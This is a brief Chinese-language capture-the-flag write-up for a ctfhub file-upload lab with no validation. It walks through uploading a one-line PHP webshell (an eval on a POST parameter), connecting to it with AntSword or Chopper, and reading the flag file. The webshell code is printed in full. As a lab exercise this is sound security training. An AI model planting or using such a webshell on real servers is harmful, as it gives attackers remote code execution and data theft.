ctfhub技能树—文件上传—无验证 打开靶机 查看页面信息 编写一句话木马 <?php echo "123"; @eval(@$_POST['a']); ?> 上传木马 上传成功,并拿到相对路径地址 查看页面信息 使用蚁剑或菜刀连接 查看目录信息 查看flag_368114112.php文件信息 成功拿到flag